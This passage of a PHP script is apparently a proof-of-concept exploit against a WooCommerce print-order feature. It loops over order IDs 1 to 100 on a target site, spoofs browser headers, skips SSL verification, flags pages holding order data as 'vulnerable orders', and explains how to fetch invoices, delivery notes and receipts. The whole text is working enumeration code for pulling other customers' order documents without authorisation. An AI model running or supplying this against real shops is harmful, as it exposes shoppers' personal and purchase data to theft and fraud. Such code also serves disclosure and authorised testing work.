    $url = $target_url . '/?print-order=' . $order_id . '&action=print';
    
    // Initialize cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Set headers to mimic a regular browser request
    $headers = [
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language: en-US,en;q=0.5',
        'Connection: keep-alive',
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    // Execute the request
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    curl_close($ch);
    
    // Check if the request was successful and contains order data
    if ($http_code == 200) {
        // Look for indicators of a successful order document
        if (strpos($response, 'order-details') !== false || 
            strpos($response, 'invoice') !== false || 
            strpos($response, 'delivery-note') !== false ||
            strpos($response, 'order-number') !== false) {
            return ['success' => true, 'order_id' => $order_id, 'url' => $url];
        }
    }
    
    return ['success' => false, 'order_id' => $order_id];
}

// Test a range of order IDs (common in WooCommerce installations)
echo "Testing order ID enumeration on: $target_url\n\n";

$found_orders = [];

// Test common order ID ranges
for ($i = 1; $i <= 100; $i++) {
    $result = test_order_id($i);
    
    if ($result['success']) {
        echo "[+] FOUND VULNERABLE ORDER: ID {$result['order_id']}\n";
        echo "    Exploit URL: {$result['url']}\n\n";
        $found_orders[] = $result;
    } else {
        echo "."; // Progress indicator
    }
    
    // Small delay to avoid rate limiting
    usleep(100000); // 0.1 second
}

// Summary
echo "\n\n=== SUMMARY ===\n";
echo "Tested order IDs: 1-100\n";
echo "Vulnerable orders found: " . count($found_orders) . "\n";

if (count($found_orders) > 0) {
    echo "\nTo retrieve specific document types, append &print-order-type= to the URL:\n";
    echo "  &print-order-type=invoice      - For invoice document\n";
    echo "  &print-order-type=delivery-note - For delivery note\n";
    echo "  &print-order-type=receipt      - For receipt\n";
    echo "  &print-order-type=order        - For order summary\n";
}

?>
